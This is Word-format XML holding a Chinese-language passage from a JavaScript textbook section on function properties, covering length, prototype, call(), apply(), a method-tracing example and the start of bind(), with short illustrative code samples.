    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本章接下来讲到的例</w:t>
      </w:r>
      <w:r>
        <w:t>8-5</w:t>
      </w:r>
      <w:r>
        <w:t>中就利用了这种编程技巧来定义闭包，以便在闭包中可以访问外部函数的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="8_7_Han_Shu_Shu_Xing___Fang_Fa_He_Gou_Za"/>
      <w:r>
        <w:t>8.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函数属性、方法和构造函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们看到在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中，函</w:t>
      </w:r>
      <w:r>
        <w:t>数是值。对函数执行</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算会返回字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"function"</w:t>
      </w:r>
      <w:r>
        <w:t>，但是函数是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中特殊的对象。因为函数也是对象，它们也可以拥有属性和方法，就像普通的对象可以拥有属性和方法一样。甚至可以用</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来创建新的函数对象。接下来几节就会着重介绍函数属性和方法以及</w:t>
      </w:r>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。在第三部分也有关于这些内容的讲解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="8_7_1_lengthShu_Xing_"/>
      <w:r>
        <w:t>8.7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在函数体里，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>表示传入函数的实参的个数。而函数本身的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性则有着不同含义。函数的</w:t>
      </w:r>
      <w:r>
        <w:t>le</w:t>
      </w:r>
      <w:r>
        <w:t>ngth</w:t>
      </w:r>
      <w:r>
        <w:t>属性是只读属性，它代表函数实参的数量，这里的参数指的是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>形参</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>而非</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>实参</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，也就是在函数定义时给出的实参个数，通常也是在函数调用时期望传入函数的实参个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的代码定义一个名叫</w:t>
      </w:r>
      <w:r>
        <w:t>check()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数，从另外一个函数给它传入</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>数组，它比较</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>（实际传入的实参个数）和</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.callee.length</w:t>
      </w:r>
      <w:r>
        <w:t>（期望传入的实参个数）来判断所传入的实参个数是否正确。如果个数不正确，则抛出异常。</w:t>
      </w:r>
      <w:r>
        <w:t>check()</w:t>
      </w:r>
      <w:r>
        <w:t>函数之后定义一个测试函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，用来展示</w:t>
      </w:r>
      <w:r>
        <w:t>check()</w:t>
      </w:r>
      <w:r>
        <w:t>的用法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数使用</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.callee</w:t>
      </w:r>
      <w:r>
        <w:t>，因此它不能在严格模式下工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function check(args){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var actual=args.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>实参的真实个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var expected=args.callee.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>期望的实参个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(actual!==expected)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不同则抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw Error("Expected"+expected+"args;got"+actual);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(x,y,z){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>check(arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>检查实参个数和期望的实参个数是否一致</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x+y+z;//</w:t>
      </w:r>
      <w:r>
        <w:t>再执行函数的后续逻辑</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10" w:name="8_7_2_prototypeShu_Xing_"/>
      <w:r>
        <w:t>8.7.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每一个函数都包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这个属性是指向一个对象的引用，这个对象称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>原型对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>prototype object</w:t>
      </w:r>
      <w:r>
        <w:t>）。每一个函数都包含不同的原型对象。当将函数用做构造函数的时候，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>新创建的对象会从原型对象上继承属性。</w:t>
      </w:r>
      <w:r>
        <w:t>6.1.3</w:t>
      </w:r>
      <w:r>
        <w:t>节讨论了原型和</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性，在第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章里会有进一步讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="8_7_3_call__Fang_Fa_He_apply__Fang_Fa_"/>
      <w:r>
        <w:t>8.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>ap</w:t>
      </w:r>
      <w:r>
        <w:t>ply()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们可以将</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>看做是某个对象的方法，通过调用方法的形式来间接调用（见</w:t>
      </w:r>
      <w:r>
        <w:t>8.2.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）函数（比如在例</w:t>
      </w:r>
      <w:r>
        <w:t>6-4</w:t>
      </w:r>
      <w:r>
        <w:t>我们使用了</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来调用一个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>Objec t.prototype.toString</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用以输出对象的类）。</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个实参是要调用函数的母对象，它是调用上下文，在函数体内通过</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>来获得对它的引用。要想以对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，可以这样使用</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.call(o);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.apply(o);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>行代码和下面代码的功能类似（假设对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中预先不存在名为</w:t>
      </w:r>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>的属性）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.m=f;//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>存储为</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的临时方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.m();//</w:t>
      </w:r>
      <w:r>
        <w:t>调用它，不传入参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete o.m;//</w:t>
      </w:r>
      <w:r>
        <w:t>将临时方法删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的严格模式中，</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个实参都会变为</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值，哪怕传入的实参是原始值甚至是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>和非严格模式中，传入的</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>都会被全局对象代替，而其他原始值则会被相应的包装对象（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">wrapper </w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>）所替代。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>来说，第一个调用上下文实参之后的所有实参就是要传入待调用函数的值。比如，以对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的方法的形式调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，并传入两个参数，可以使用这样的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.call(o,1,2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>类似，但传入实参的形式和</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>有所不同，它的实参都放入一个数组当中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.apply(o,[1,2]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果一个函数的实参可以是任意数量，给</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>传入的参数数组可以是任意长度的。比如，为了找出数组中最大的数值元素，调用</w:t>
      </w:r>
      <w:r>
        <w:t>Math.max()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的时候可以给</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>传入一个包含任意个元素的数组：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var biggest=Math.max.apply(Math,array_of_numbers);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，传入</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>的参数数组可以是类数组对象也可以是真实数组。实际上，可以将当前函数的</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>数组直接传入（另一个函数的）</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>来调用另一个函数，参照如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中名为</w:t>
      </w:r>
      <w:r>
        <w:t>m()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法替换为另一个方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>可以在调用原始的方法之前和之后记录日志消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function trace(o,m){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var original=o[m];//</w:t>
      </w:r>
      <w:r>
        <w:t>在闭包中保存原始方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o[m]=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义新的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(new Date(),"Entering:",m);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出日志消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var result=original.apply(this,arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用原始函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(new Date(),"Exiting:",m)</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>输出日志消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return result;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回结果</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trace()</w:t>
      </w:r>
      <w:r>
        <w:t>函数接收两个参数，一个对象和一个方法名，它将指定的方法替换为一个新方法，这个新方法是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包裹</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>原始方法的另一个泛函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[14]</w:t>
      </w:r>
      <w:r>
        <w:t>。这种动态修改已有方法的做法有时称做</w:t>
      </w:r>
      <w:r>
        <w:t>"monkey-patching"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="8_7_4_bind__Fang_Fa_"/>
      <w:r>
        <w:t>8.7.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>是在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中新增的方法，但在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中可以轻易模拟</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>。从名字就可以看出，这个方法的主要作用就是将函数绑定至某个对象。当在函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>上调用</w:t>
      </w:r>
      <w:r>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:t>d()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并传入一个对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数，这个方法将返回一个新的函数。（以函数调用的方式）调用新的函数将会把原始的函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>当做</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来调用。传入新函数的任何实参都将传入原始函数，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(y){return this.x+y;}//</w:t>
      </w:r>
      <w:r>
        <w:t>这个是待绑定的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1};//</w:t>
      </w:r>
      <w:r>
        <w:t>将要绑定的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var g=f.bind(o);//</w:t>
      </w:r>
      <w:r>
        <w:t>通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>g(x)</w:t>
      </w:r>
      <w:r>
        <w:t>来调用</w:t>
      </w:r>
      <w:r>
        <w:t>o.f(x)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g(2)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
